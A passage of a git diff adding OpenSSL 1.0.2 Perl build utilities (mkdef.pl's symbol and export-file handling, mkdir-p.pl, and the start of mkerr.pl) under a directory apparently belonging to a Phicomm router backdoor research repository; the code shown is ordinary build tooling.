+				} elsif (/^\s*DECLARE_ASN1_SET_OF\s*\(\s*(\w*)\s*\)/) {
+					next;
+				} elsif (/^\s*DECLARE_ASN1_PRINT_FUNCTION\s*\(\s*(\w*)\s*\)/) {
+					$def .= "int $1_print_ctx(void);";
+					next;
+				} elsif (/^\s*DECLARE_ASN1_PRINT_FUNCTION_name\s*\(\s*(\w*)\s*,\s*(\w*)\s*\)/) {
+					$def .= "int $2_print_ctx(void);";
+					next;
+				} elsif (/^\s*DECLARE_PKCS12_STACK_OF\s*\(\s*(\w*)\s*\)/) {
+					next;
+				} elsif (/^DECLARE_PEM_rw\s*\(\s*(\w*)\s*,/ ||
+					 /^DECLARE_PEM_rw_cb\s*\(\s*(\w*)\s*,/ ||
+					 /^DECLARE_PEM_rw_const\s*\(\s*(\w*)\s*,/ ) {
+					# Things not in Win16
+					$def .=
+					    "#INFO:"
+						.join(',',"!WIN16",@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					$def .= "int PEM_read_$1(void);";
+					$def .= "int PEM_write_$1(void);";
+					$def .=
+					    "#INFO:"
+						.join(',',@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					# Things that are everywhere
+					$def .= "int PEM_read_bio_$1(void);";
+					$def .= "int PEM_write_bio_$1(void);";
+					next;
+				} elsif (/^DECLARE_PEM_write\s*\(\s*(\w*)\s*,/ ||
+					/^DECLARE_PEM_write_const\s*\(\s*(\w*)\s*,/ ||
+					 /^DECLARE_PEM_write_cb\s*\(\s*(\w*)\s*,/ ) {
+					# Things not in Win16
+					$def .=
+					    "#INFO:"
+						.join(',',"!WIN16",@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					$def .= "int PEM_write_$1(void);";
+					$def .=
+					    "#INFO:"
+						.join(',',@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					# Things that are everywhere
+					$def .= "int PEM_write_bio_$1(void);";
+					next;
+				} elsif (/^DECLARE_PEM_read\s*\(\s*(\w*)\s*,/ ||
+					 /^DECLARE_PEM_read_cb\s*\(\s*(\w*)\s*,/ ) {
+					# Things not in Win16
+					$def .=
+					    "#INFO:"
+						.join(',',"!WIN16",@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					$def .= "int PEM_read_$1(void);";
+					$def .=
+					    "#INFO:"
+						.join(',',@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					# Things that are everywhere
+					$def .= "int PEM_read_bio_$1(void);";
+					next;
+				} elsif (/^OPENSSL_DECLARE_GLOBAL\s*\(\s*(\w*)\s*,\s*(\w*)\s*\)/) {
+					# Variant for platforms that do not
+					# have to access globale variables
+					# in shared libraries through functions
+					$def .=
+					    "#INFO:"
+						.join(',',"!EXPORT_VAR_AS_FUNCTION",@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					$def .= "OPENSSL_EXTERN int _shadow_$2;";
+					$def .=
+					    "#INFO:"
+						.join(',',@current_platforms).":"
+						    .join(',',@current_algorithms).";";
+					# Variant for platforms that have to
+					# access globale variables in shared
+					# libraries through functions
+					&$make_variant("_shadow_$2","_shadow_$2",
+						      "EXPORT_VAR_AS_FUNCTION",
+						      "FUNCTION");
+				} elsif ($tag{'CONST_STRICT'} != 1) {
+					if (/\{|\/\*|\([^\)]*$/) {
+						$line = $_;
+					} else {
+						$def .= $_;
+					}
+				}
+			}
+		}
+		close(IN);
+
+		my $algs;
+		my $plays;
+
+		print STDERR "DEBUG: postprocessing ----------\n" if $debug;
+		foreach (split /;/, $def) {
+			my $s; my $k = "FUNCTION"; my $p; my $a;
+			s/^[\n\s]*//g;
+			s/[\n\s]*$//g;
+			next if(/\#undef/);
+			next if(/typedef\W/);
+			next if(/\#define/);
+
+			# Reduce argument lists to empty ()
+			# fold round brackets recursively: (t(*v)(t),t) -> (t{}{},t) -> {}
+			while(/\(.*\)/s) {
+				s/\([^\(\)]+\)/\{\}/gs;
+				s/\(\s*\*\s*(\w+)\s*\{\}\s*\)/$1/gs;	#(*f{}) -> f
+			}
+			# pretend as we didn't use curly braces: {} -> ()
+			s/\{\}/\(\)/gs;
+
+			s/STACK_OF\(\)/void/gs;
+			s/LHASH_OF\(\)/void/gs;
+
+			print STDERR "DEBUG: \$_ = \"$_\"\n" if $debug;
+			if (/^\#INFO:([^:]*):(.*)$/) {
+				$plats = $1;
+				$algs = $2;
+				print STDERR "DEBUG: found info on platforms ($plats) and algorithms ($algs)\n" if $debug;
+				next;
+			} elsif (/^\s*OPENSSL_EXTERN\s.*?(\w+(\{[0-9]+\})?)(\[[0-9]*\])*\s*$/) {
+				$s = $1;
+				$k = "VARIABLE";
+				print STDERR "DEBUG: found external variable $s\n" if $debug;
+			} elsif (/TYPEDEF_\w+_OF/s) {
+				next;
+			} elsif (/(\w+)\s*\(\).*/s) {	# first token prior [first] () is
+				$s = $1;		# a function name!
+				print STDERR "DEBUG: found function $s\n" if $debug;
+			} elsif (/\(/ and not (/=/)) {
+				print STDERR "File $file: cannot parse: $_;\n";
+				next;
+			} else {
+				next;
+			}
+
+			$syms{$s} = 1;
+			$kind{$s} = $k;
+
+			$p = $plats;
+			$a = $algs;
+			$a .= ",BF" if($s =~ /EVP_bf/);
+			$a .= ",CAST" if($s =~ /EVP_cast/);
+			$a .= ",DES" if($s =~ /EVP_des/);
+			$a .= ",DSA" if($s =~ /EVP_dss/);
+			$a .= ",IDEA" if($s =~ /EVP_idea/);
+			$a .= ",MD2" if($s =~ /EVP_md2/);
+			$a .= ",MD4" if($s =~ /EVP_md4/);
+			$a .= ",MD5" if($s =~ /EVP_md5/);
+			$a .= ",RC2" if($s =~ /EVP_rc2/);
+			$a .= ",RC4" if($s =~ /EVP_rc4/);
+			$a .= ",RC5" if($s =~ /EVP_rc5/);
+			$a .= ",RIPEMD" if($s =~ /EVP_ripemd/);
+			$a .= ",SHA" if($s =~ /EVP_sha/);
+			$a .= ",RSA" if($s =~ /EVP_(Open|Seal)(Final|Init)/);
+			$a .= ",RSA" if($s =~ /PEM_Seal(Final|Init|Update)/);
+			$a .= ",RSA" if($s =~ /RSAPrivateKey/);
+			$a .= ",RSA" if($s =~ /SSLv23?_((client|server)_)?method/);
+
+			$platform{$s} =
+			    &reduce_platforms((defined($platform{$s})?$platform{$s}.',':"").$p);
+			$algorithm{$s} .= ','.$a;
+
+			if (defined($variant{$s})) {
+				foreach $v (split /;/,$variant{$s}) {
+					(my $r, my $p, my $k) = split(/:/,$v);
+					my $ip = join ',',map({ /^!(.*)$/ ? $1 : "!".$_ } split /,/, $p);
+					$syms{$r} = 1;
+					if (!defined($k)) { $k = $kind{$s}; }
+					$kind{$r} = $k."(".$s.")";
+					$algorithm{$r} = $algorithm{$s};
+					$platform{$r} = &reduce_platforms($platform{$s}.",".$p.",".$p);
+					$platform{$s} = &reduce_platforms($platform{$s}.','.$ip.','.$ip);
+					print STDERR "DEBUG: \$variant{\"$s\"} = ",$v,"; \$r = $r; \$p = ",$platform{$r},"; \$a = ",$algorithm{$r},"; \$kind = ",$kind{$r},"\n" if $debug;
+				}
+			}
+			print STDERR "DEBUG: \$s = $s; \$p = ",$platform{$s},"; \$a = ",$algorithm{$s},"; \$kind = ",$kind{$s},"\n" if $debug;
+		}
+	}
+
+	# Prune the returned symbols
+
+        delete $syms{"bn_dump1"};
+	$platform{"BIO_s_log"} .= ",!WIN32,!WIN16,!macintosh";
+
+	$platform{"PEM_read_NS_CERT_SEQ"} = "VMS";
+	$platform{"PEM_write_NS_CERT_SEQ"} = "VMS";
+	$platform{"PEM_read_P8_PRIV_KEY_INFO"} = "VMS";
+	$platform{"PEM_write_P8_PRIV_KEY_INFO"} = "VMS";
+	$platform{"EVP_sha384"} = "!VMSVAX";
+	$platform{"EVP_sha512"} = "!VMSVAX";
+	$platform{"SHA384_Init"} = "!VMSVAX";
+	$platform{"SHA384_Transform"} = "!VMSVAX";
+	$platform{"SHA384_Update"} = "!VMSVAX";
+	$platform{"SHA384_Final"} = "!VMSVAX";
+	$platform{"SHA384"} = "!VMSVAX";
+	$platform{"SHA512_Init"} = "!VMSVAX";
+	$platform{"SHA512_Transform"} = "!VMSVAX";
+	$platform{"SHA512_Update"} = "!VMSVAX";
+	$platform{"SHA512_Final"} = "!VMSVAX";
+	$platform{"SHA512"} = "!VMSVAX";
+	$platform{"WHIRLPOOL_Init"} = "!VMSVAX";
+	$platform{"WHIRLPOOL"} = "!VMSVAX";
+	$platform{"WHIRLPOOL_BitUpdate"} = "!VMSVAX";
+	$platform{"EVP_whirlpool"} = "!VMSVAX";
+	$platform{"WHIRLPOOL_Final"} = "!VMSVAX";
+	$platform{"WHIRLPOOL_Update"} = "!VMSVAX";
+
+
+	# Info we know about
+
+	push @ret, map { $_."\\".&info_string($_,"EXIST",
+					      $platform{$_},
+					      $kind{$_},
+					      $algorithm{$_}) } keys %syms;
+
+	if (keys %unknown_algorithms) {
+		print STDERR "WARNING: mkdef.pl doesn't know the following algorithms:\n";
+		print STDERR "\t",join("\n\t",keys %unknown_algorithms),"\n";
+	}
+	return(@ret);
+}
+
+# Param: string of comma-separated platform-specs.
+sub reduce_platforms
+{
+	my ($platforms) = @_;
+	my $pl = defined($platforms) ? $platforms : "";
+	my %p = map { $_ => 0 } split /,/, $pl;
+	my $ret;
+
+	print STDERR "DEBUG: Entered reduce_platforms with \"$platforms\"\n"
+	    if $debug;
+	# We do this, because if there's code like the following, it really
+	# means the function exists in all cases and should therefore be
+	# everywhere.  By increasing and decreasing, we may attain 0:
+	#
+	# ifndef WIN16
+	#    int foo();
+	# else
+	#    int _fat foo();
+	# endif
+	foreach $platform (split /,/, $pl) {
+		if ($platform =~ /^!(.*)$/) {
+			$p{$1}--;
+		} else {
+			$p{$platform}++;
+		}
+	}
+	foreach $platform (keys %p) {
+		if ($p{$platform} == 0) { delete $p{$platform}; }
+	}
+
+	delete $p{""};
+
+	$ret = join(',',sort(map { $p{$_} < 0 ? "!".$_ : $_ } keys %p));
+	print STDERR "DEBUG: Exiting reduce_platforms with \"$ret\"\n"
+	    if $debug;
+	return $ret;
+}
+
+sub info_string {
+	(my $symbol, my $exist, my $platforms, my $kind, my $algorithms) = @_;
+
+	my %a = defined($algorithms) ?
+	    map { $_ => 1 } split /,/, $algorithms : ();
+	my $k = defined($kind) ? $kind : "FUNCTION";
+	my $ret;
+	my $p = &reduce_platforms($platforms);
+
+	delete $a{""};
+
+	$ret = $exist;
+	$ret .= ":".$p;
+	$ret .= ":".$k;
+	$ret .= ":".join(',',sort keys %a);
+	return $ret;
+}
+
+sub maybe_add_info {
+	(my $name, *nums, my @symbols) = @_;
+	my $sym;
+	my $new_info = 0;
+	my %syms=();
+
+	print STDERR "Updating $name info\n";
+	foreach $sym (@symbols) {
+		(my $s, my $i) = split /\\/, $sym;
+		if (defined($nums{$s})) {
+			$i =~ s/^(.*?:.*?:\w+)(\(\w+\))?/$1/;
+			(my $n, my $dummy) = split /\\/, $nums{$s};
+			if (!defined($dummy) || $i ne $dummy) {
+				$nums{$s} = $n."\\".$i;
+				$new_info++;
+				print STDERR "DEBUG: maybe_add_info for $s: \"$dummy\" => \"$i\"\n" if $debug;
+			}
+		}
+		$syms{$s} = 1;
+	}
+
+	my @s=sort { &parse_number($nums{$a},"n") <=> &parse_number($nums{$b},"n") } keys %nums;
+	foreach $sym (@s) {
+		(my $n, my $i) = split /\\/, $nums{$sym};
+		if (!defined($syms{$sym}) && $i !~ /^NOEXIST:/) {
+			$new_info++;
+			print STDERR "DEBUG: maybe_add_info for $sym: -> undefined\n" if $debug;
+		}
+	}
+	if ($new_info) {
+		print STDERR "$new_info old symbols got an info update\n";
+		if (!$do_rewrite) {
+			print STDERR "You should do a rewrite to fix this.\n";
+		}
+	} else {
+		print STDERR "No old symbols needed info update\n";
+	}
+}
+
+# Param: string of comma-separated keywords, each possibly prefixed with a "!"
+sub is_valid
+{
+	my ($keywords_txt,$platforms) = @_;
+	my (@keywords) = split /,/,$keywords_txt;
+	my ($falsesum, $truesum) = (0, 1);
+
+	# Param: one keyword
+	sub recognise
+	{
+		my ($keyword,$platforms) = @_;
+
+		if ($platforms) {
+			# platforms
+			if ($keyword eq "VMSVAX" && $VMSVAX) { return 1; }
+			if ($keyword eq "VMSNonVAX" && $VMSNonVAX) { return 1; }
+			if ($keyword eq "VMS" && $VMS) { return 1; }
+			if ($keyword eq "WIN32" && $W32) { return 1; }
+			if ($keyword eq "WIN16" && $W16) { return 1; }
+			if ($keyword eq "WINNT" && $NT) { return 1; }
+			if ($keyword eq "OS2" && $OS2) { return 1; }
+			# Special platforms:
+			# EXPORT_VAR_AS_FUNCTION means that global variables
+			# will be represented as functions.  This currently
+			# only happens on VMS-VAX.
+			if ($keyword eq "EXPORT_VAR_AS_FUNCTION" && ($VMSVAX || $W32 || $W16)) {
+				return 1;
+			}
+			if ($keyword eq "OPENSSL_FIPS" && $fips) {
+				return 1;
+			}
+			if ($keyword eq "ZLIB" && $zlib) { return 1; }
+			return 0;
+		} else {
+			# algorithms
+			if ($keyword eq "RC2" && $no_rc2) { return 0; }
+			if ($keyword eq "RC4" && $no_rc4) { return 0; }
+			if ($keyword eq "RC5" && $no_rc5) { return 0; }
+			if ($keyword eq "IDEA" && $no_idea) { return 0; }
+			if ($keyword eq "DES" && $no_des) { return 0; }
+			if ($keyword eq "BF" && $no_bf) { return 0; }
+			if ($keyword eq "CAST" && $no_cast) { return 0; }
+			if ($keyword eq "MD2" && $no_md2) { return 0; }
+			if ($keyword eq "MD4" && $no_md4) { return 0; }
+			if ($keyword eq "MD5" && $no_md5) { return 0; }
+			if ($keyword eq "SHA" && $no_sha) { return 0; }
+			if ($keyword eq "RIPEMD" && $no_ripemd) { return 0; }
+			if ($keyword eq "MDC2" && $no_mdc2) { return 0; }
+			if ($keyword eq "WHIRLPOOL" && $no_whirlpool) { return 0; }
+			if ($keyword eq "RSA" && $no_rsa) { return 0; }
+			if ($keyword eq "DSA" && $no_dsa) { return 0; }
+			if ($keyword eq "DH" && $no_dh) { return 0; }
+			if ($keyword eq "EC" && $no_ec) { return 0; }
+			if ($keyword eq "ECDSA" && $no_ecdsa) { return 0; }
+			if ($keyword eq "ECDH" && $no_ecdh) { return 0; }
+			if ($keyword eq "HMAC" && $no_hmac) { return 0; }
+			if ($keyword eq "AES" && $no_aes) { return 0; }
+			if ($keyword eq "CAMELLIA" && $no_camellia) { return 0; }
+			if ($keyword eq "SEED" && $no_seed) { return 0; }
+			if ($keyword eq "EVP" && $no_evp) { return 0; }
+			if ($keyword eq "LHASH" && $no_lhash) { return 0; }
+			if ($keyword eq "STACK" && $no_stack) { return 0; }
+			if ($keyword eq "ERR" && $no_err) { return 0; }
+			if ($keyword eq "BUFFER" && $no_buffer) { return 0; }
+			if ($keyword eq "BIO" && $no_bio) { return 0; }
+			if ($keyword eq "COMP" && $no_comp) { return 0; }
+			if ($keyword eq "DSO" && $no_dso) { return 0; }
+			if ($keyword eq "KRB5" && $no_krb5) { return 0; }
+			if ($keyword eq "ENGINE" && $no_engine) { return 0; }
+			if ($keyword eq "HW" && $no_hw) { return 0; }
+			if ($keyword eq "FP_API" && $no_fp_api) { return 0; }
+			if ($keyword eq "STATIC_ENGINE" && $no_static_engine) { return 0; }
+			if ($keyword eq "GMP" && $no_gmp) { return 0; }
+			if ($keyword eq "RFC3779" && $no_rfc3779) { return 0; }
+			if ($keyword eq "TLSEXT" && $no_tlsext) { return 0; }
+			if ($keyword eq "PSK" && $no_psk) { return 0; }
+			if ($keyword eq "CMS" && $no_cms) { return 0; }
+			if ($keyword eq "EC2M" && $no_ec2m) { return 0; }
+			if ($keyword eq "NEXTPROTONEG" && $no_nextprotoneg) { return 0; }
+			if ($keyword eq "EC_NISTP_64_GCC_128" && $no_nistp_gcc)
+					{ return 0; }
+			if ($keyword eq "SSL2" && $no_ssl2) { return 0; }
+			if ($keyword eq "SSL3_METHOD" && $no_ssl3_method) { return 0; }
+			if ($keyword eq "SSL_TRACE" && $no_ssl_trace) { return 0; }
+			if ($keyword eq "CAPIENG" && $no_capieng) { return 0; }
+			if ($keyword eq "JPAKE" && $no_jpake) { return 0; }
+			if ($keyword eq "SRP" && $no_srp) { return 0; }
+			if ($keyword eq "SCTP" && $no_sctp) { return 0; }
+			if ($keyword eq "SRTP" && $no_srtp) { return 0; }
+			if ($keyword eq "UNIT_TEST" && $no_unit_test) { return 0; }
+			if ($keyword eq "DEPRECATED" && $no_deprecated) { return 0; }
+
+			# Nothing recognise as true
+			return 1;
+		}
+	}
+
+	foreach $k (@keywords) {
+		if ($k =~ /^!(.*)$/) {
+			$falsesum += &recognise($1,$platforms);
+		} else {
+			$truesum *= &recognise($k,$platforms);
+		}
+	}
+	print STDERR "DEBUG: [",$#keywords,",",$#keywords < 0,"] is_valid($keywords_txt) => (\!$falsesum) && $truesum = ",(!$falsesum) && $truesum,"\n" if $debug;
+	return (!$falsesum) && $truesum;
+}
+
+sub print_test_file
+{
+	(*OUT,my $name,*nums,my $testall,my @symbols)=@_;
+	my $n = 1; my @e; my @r;
+	my $sym; my $prev = ""; my $prefSSLeay;
+
+	(@e)=grep(/^SSLeay(\{[0-9]+\})?\\.*?:.*?:.*/,@symbols);
+	(@r)=grep(/^\w+(\{[0-9]+\})?\\.*?:.*?:.*/ && !/^SSLeay(\{[0-9]+\})?\\.*?:.*?:.*/,@symbols);
+	@symbols=((sort @e),(sort @r));
+
+	foreach $sym (@symbols) {
+		(my $s, my $i) = $sym =~ /^(.*?)\\(.*)$/;
+		my $v = 0;
+		$v = 1 if $i=~ /^.*?:.*?:VARIABLE/;
+		my $p = ($i =~ /^[^:]*:([^:]*):/,$1);
+		my $a = ($i =~ /^[^:]*:[^:]*:[^:]*:([^:]*)/,$1);
+		if (!defined($nums{$s})) {
+			print STDERR "Warning: $s does not have a number assigned\n"
+			    if(!$do_update);
+		} elsif (is_valid($p,1) && is_valid($a,0)) {
+			my $s2 = ($s =~ /^(.*?)(\{[0-9]+\})?$/, $1);
+			if ($prev eq $s2) {
+				print OUT "\t/* The following has already appeared previously */\n";
+				print STDERR "Warning: Symbol '",$s2,"' redefined. old=",($nums{$prev} =~ /^(.*?)\\/,$1),", new=",($nums{$s2} =~ /^(.*?)\\/,$1),"\n";
+			}
+			$prev = $s2;	# To warn about duplicates...
+
+			($nn,$ni)=($nums{$s2} =~ /^(.*?)\\(.*)$/);
+			if ($v) {
+				print OUT "\textern int $s2; /* type unknown */ /* $nn $ni */\n";
+			} else {
+				print OUT "\textern int $s2(); /* type unknown */ /* $nn $ni */\n";
+			}
+		}
+	}
+}
+
+sub get_version {
+   local *MF;
+   my $v = '?';
+   open MF, 'Makefile' or return $v;
+   while (<MF>) {
+     $v = $1, last if /^VERSION=(.*?)\s*$/;
+   }
+   close MF;
+   return $v;
+}
+
+sub print_def_file
+{
+	(*OUT,my $name,*nums,my @symbols)=@_;
+	my $n = 1; my @e; my @r; my @v; my $prev="";
+	my $liboptions="";
+	my $libname = $name;
+	my $http_vendor = 'www.openssl.org/';
+	my $version = get_version();
+	my $what = "OpenSSL: implementation of Secure Socket Layer";
+	my $description = "$what $version, $name - http://$http_vendor";
+
+	if ($W32)
+		{ $libname.="32"; }
+	elsif ($W16)
+		{ $libname.="16"; }
+	elsif ($OS2)
+		{ # DLL names should not clash on the whole system.
+		  # However, they should not have any particular relationship
+		  # to the name of the static library.  Chose descriptive names
+		  # (must be at most 8 chars).
+		  my %translate = (ssl => 'open_ssl', crypto => 'cryptssl');
+		  $libname = $translate{$name} || $name;
+		  $liboptions = <<EOO;
+INITINSTANCE
+DATA MULTIPLE NONSHARED
+EOO
+		  # Vendor field can't contain colon, drat; so we omit http://
+		  $description = "\@#$http_vendor:$version#\@$what; DLL for library $name.  Build for EMX -Zmtd";
+		}
+
+	print OUT <<"EOF";
+;
+; Definition file for the DLL version of the $name library from OpenSSL
+;
+
+LIBRARY         $libname	$liboptions
+
+EOF
+
+	if ($W16) {
+		print <<"EOF";
+CODE            PRELOAD MOVEABLE
+DATA            PRELOAD MOVEABLE SINGLE
+
+EXETYPE		WINDOWS
+
+HEAPSIZE	4096
+STACKSIZE	8192
+
+EOF
+	}
+
+	print "EXPORTS\n";
+
+	(@e)=grep(/^SSLeay(\{[0-9]+\})?\\.*?:.*?:FUNCTION/,@symbols);
+	(@r)=grep(/^\w+(\{[0-9]+\})?\\.*?:.*?:FUNCTION/ && !/^SSLeay(\{[0-9]+\})?\\.*?:.*?:FUNCTION/,@symbols);
+	(@v)=grep(/^\w+(\{[0-9]+\})?\\.*?:.*?:VARIABLE/,@symbols);
+	@symbols=((sort @e),(sort @r), (sort @v));
+
+
+	foreach $sym (@symbols) {
+		(my $s, my $i) = $sym =~ /^(.*?)\\(.*)$/;
+		my $v = 0;
+		$v = 1 if $i =~ /^.*?:.*?:VARIABLE/;
+		if (!defined($nums{$s})) {
+			printf STDERR "Warning: $s does not have a number assigned\n"
+			    if(!$do_update);
+		} else {
+			(my $n, my $dummy) = split /\\/, $nums{$s};
+			my %pf = ();
+			my $p = ($i =~ /^[^:]*:([^:]*):/,$1);
+			my $a = ($i =~ /^[^:]*:[^:]*:[^:]*:([^:]*)/,$1);
+			if (is_valid($p,1) && is_valid($a,0)) {
+				my $s2 = ($s =~ /^(.*?)(\{[0-9]+\})?$/, $1);
+				if ($prev eq $s2) {
+					print STDERR "Warning: Symbol '",$s2,"' redefined. old=",($nums{$prev} =~ /^(.*?)\\/,$1),", new=",($nums{$s2} =~ /^(.*?)\\/,$1),"\n";
+				}
+				$prev = $s2;	# To warn about duplicates...
+				if($v && !$OS2) {
+					printf OUT "    %s%-39s @%-8d DATA\n",($W32)?"":"_",$s2,$n;
+				} else {
+					printf OUT "    %s%-39s @%d\n",($W32||$OS2)?"":"_",$s2,$n;
+				}
+			}
+		}
+	}
+	printf OUT "\n";
+}
+
+sub load_numbers
+{
+	my($name)=@_;
+	my(@a,%ret);
+
+	$max_num = 0;
+	$num_noinfo = 0;
+	$prev = "";
+	$prev_cnt = 0;
+
+	open(IN,"<$name") || die "unable to open $name:$!\n";
+	while (<IN>) {
+		chop;
+		s/#.*$//;
+		next if /^\s*$/;
+		@a=split;
+		if (defined $ret{$a[0]}) {
+			# This is actually perfectly OK
+			#print STDERR "Warning: Symbol '",$a[0],"' redefined. old=",$ret{$a[0]},", new=",$a[1],"\n";
+		}
+		if ($max_num > $a[1]) {
+			print STDERR "Warning: Number decreased from ",$max_num," to ",$a[1],"\n";
+		}
+		elsif ($max_num == $a[1]) {
+			# This is actually perfectly OK
+			#print STDERR "Warning: Symbol ",$a[0]," has same number as previous ",$prev,": ",$a[1],"\n";
+			if ($a[0] eq $prev) {
+				$prev_cnt++;
+				$a[0] .= "{$prev_cnt}";
+			}
+		}
+		else {
+			$prev_cnt = 0;
+		}
+		if ($#a < 2) {
+			# Existence will be proven later, in do_defs
+			$ret{$a[0]}=$a[1];
+			$num_noinfo++;
+		} else {
+			$ret{$a[0]}=$a[1]."\\".$a[2]; # \\ is a special marker
+		}
+		$max_num = $a[1] if $a[1] > $max_num;
+		$prev=$a[0];
+	}
+	if ($num_noinfo) {
+		print STDERR "Warning: $num_noinfo symbols were without info.";
+		if ($do_rewrite) {
+			printf STDERR "  The rewrite will fix this.\n";
+		} else {
+			printf STDERR "  You should do a rewrite to fix this.\n";
+		}
+	}
+	close(IN);
+	return(%ret);
+}
+
+sub parse_number
+{
+	(my $str, my $what) = @_;
+	(my $n, my $i) = split(/\\/,$str);
+	if ($what eq "n") {
+		return $n;
+	} else {
+		return $i;
+	}
+}
+
+sub rewrite_numbers
+{
+	(*OUT,$name,*nums,@symbols)=@_;
+	my $thing;
+
+	print STDERR "Rewriting $name\n";
+
+	my @r = grep(/^\w+(\{[0-9]+\})?\\.*?:.*?:\w+\(\w+\)/,@symbols);
+	my $r; my %r; my %rsyms;
+	foreach $r (@r) {
+		(my $s, my $i) = split /\\/, $r;
+		my $a = $1 if $i =~ /^.*?:.*?:\w+\((\w+)\)/;
+		$i =~ s/^(.*?:.*?:\w+)\(\w+\)/$1/;
+		$r{$a} = $s."\\".$i;
+		$rsyms{$s} = 1;
+	}
+
+	my %syms = ();
+	foreach $_ (@symbols) {
+		(my $n, my $i) = split /\\/;
+		$syms{$n} = 1;
+	}
+
+	my @s=sort {
+	    &parse_number($nums{$a},"n") <=> &parse_number($nums{$b},"n")
+	    || $a cmp $b
+	} keys %nums;
+	foreach $sym (@s) {
+		(my $n, my $i) = split /\\/, $nums{$sym};
+		next if defined($i) && $i =~ /^.*?:.*?:\w+\(\w+\)/;
+		next if defined($rsyms{$sym});
+		print STDERR "DEBUG: rewrite_numbers for sym = ",$sym,": i = ",$i,", n = ",$n,", rsym{sym} = ",$rsyms{$sym},"syms{sym} = ",$syms{$sym},"\n" if $debug;
+		$i="NOEXIST::FUNCTION:"
+			if !defined($i) || $i eq "" || !defined($syms{$sym});
+		my $s2 = $sym;
+		$s2 =~ s/\{[0-9]+\}$//;
+		printf OUT "%s%-39s %d\t%s\n","",$s2,$n,$i;
+		if (exists $r{$sym}) {
+			(my $s, $i) = split /\\/,$r{$sym};
+			my $s2 = $s;
+			$s2 =~ s/\{[0-9]+\}$//;
+			printf OUT "%s%-39s %d\t%s\n","",$s2,$n,$i;
+		}
+	}
+}
+
+sub update_numbers
+{
+	(*OUT,$name,*nums,my $start_num, my @symbols)=@_;
+	my $new_syms = 0;
+
+	print STDERR "Updating $name numbers\n";
+
+	my @r = grep(/^\w+(\{[0-9]+\})?\\.*?:.*?:\w+\(\w+\)/,@symbols);
+	my $r; my %r; my %rsyms;
+	foreach $r (@r) {
+		(my $s, my $i) = split /\\/, $r;
+		my $a = $1 if $i =~ /^.*?:.*?:\w+\((\w+)\)/;
+		$i =~ s/^(.*?:.*?:\w+)\(\w+\)/$1/;
+		$r{$a} = $s."\\".$i;
+		$rsyms{$s} = 1;
+	}
+
+	foreach $sym (@symbols) {
+		(my $s, my $i) = $sym =~ /^(.*?)\\(.*)$/;
+		next if $i =~ /^.*?:.*?:\w+\(\w+\)/;
+		next if defined($rsyms{$sym});
+		die "ERROR: Symbol $sym had no info attached to it."
+		    if $i eq "";
+		if (!exists $nums{$s}) {
+			$new_syms++;
+			my $s2 = $s;
+			$s2 =~ s/\{[0-9]+\}$//;
+			printf OUT "%s%-39s %d\t%s\n","",$s2, ++$start_num,$i;
+			if (exists $r{$s}) {
+				($s, $i) = split /\\/,$r{$s};
+				$s =~ s/\{[0-9]+\}$//;
+				printf OUT "%s%-39s %d\t%s\n","",$s, $start_num,$i;
+			}
+		}
+	}
+	if($new_syms) {
+		print STDERR "$new_syms New symbols added\n";
+	} else {
+		print STDERR "No New symbols Added\n";
+	}
+}
+
+sub check_existing
+{
+	(*nums, my @symbols)=@_;
+	my %existing; my @remaining;
+	@remaining=();
+	foreach $sym (@symbols) {
+		(my $s, my $i) = $sym =~ /^(.*?)\\(.*)$/;
+		$existing{$s}=1;
+	}
+	foreach $sym (keys %nums) {
+		if (!exists $existing{$sym}) {
+			push @remaining, $sym;
+		}
+	}
+	if(@remaining) {
+		print STDERR "The following symbols do not seem to exist:\n";
+		foreach $sym (@remaining) {
+			print STDERR "\t",$sym,"\n";
+		}
+	}
+}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkdir-p.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkdir-p.pl
new file mode 100755
index 0000000..e73d02b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkdir-p.pl
@@ -0,0 +1,34 @@
+#!/usr/local/bin/perl
+
+# mkdir-p.pl
+
+# On some systems, the -p option to mkdir (= also create any missing parent
+# directories) is not available.
+
+my $arg;
+
+foreach $arg (@ARGV) {
+  $arg =~ tr|\\|/|;
+  &do_mkdir_p($arg);
+}
+
+
+sub do_mkdir_p {
+  local($dir) = @_;
+
+  $dir =~ s|/*\Z(?!\n)||s;
+
+  if (-d $dir) {
+    return;
+  }
+
+  if ($dir =~ m|[^/]/|s) {
+    local($parent) = $dir;
+    $parent =~ s|[^/]*\Z(?!\n)||s;
+
+    do_mkdir_p($parent);
+  }
+
+  mkdir($dir, 0777) || die "Cannot create directory $dir: $!\n";
+  print "created directory `$dir'\n";
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkerr.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkerr.pl
new file mode 100644
index 0000000..88388f5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkerr.pl
@@ -0,0 +1,811 @@
+#!/usr/local/bin/perl -w
+
+my $config = "crypto/err/openssl.ec";
+my $hprefix = "openssl/";
+my $debug = 0;
+my $rebuild = 0;
+my $static = 1;
+my $recurse = 0;
+my $reindex = 0;
+my $dowrite = 0;
+my $staticloader = "";
+
+my $pack_errcode;
+my $load_errcode;
+
+my $errcount;
+my $year = (localtime)[5] + 1900;
+
+while (@ARGV) {
+	my $arg = $ARGV[0];
+	if($arg eq "-conf") {
+		shift @ARGV;
+		$config = shift @ARGV;
+	} elsif($arg eq "-hprefix") {
+		shift @ARGV;
+		$hprefix = shift @ARGV;
+	} elsif($arg eq "-debug") {
+		$debug = 1;
+		shift @ARGV;
+	} elsif($arg eq "-rebuild") {
+		$rebuild = 1;
+		shift @ARGV;
+	} elsif($arg eq "-recurse") {
+		$recurse = 1;
+		shift @ARGV;
+	} elsif($arg eq "-reindex") {
+		$reindex = 1;
+		shift @ARGV;
+	} elsif($arg eq "-nostatic") {
+		$static = 0;
+		shift @ARGV;
+	} elsif($arg eq "-staticloader") {
+		$staticloader = "static ";
+		shift @ARGV;
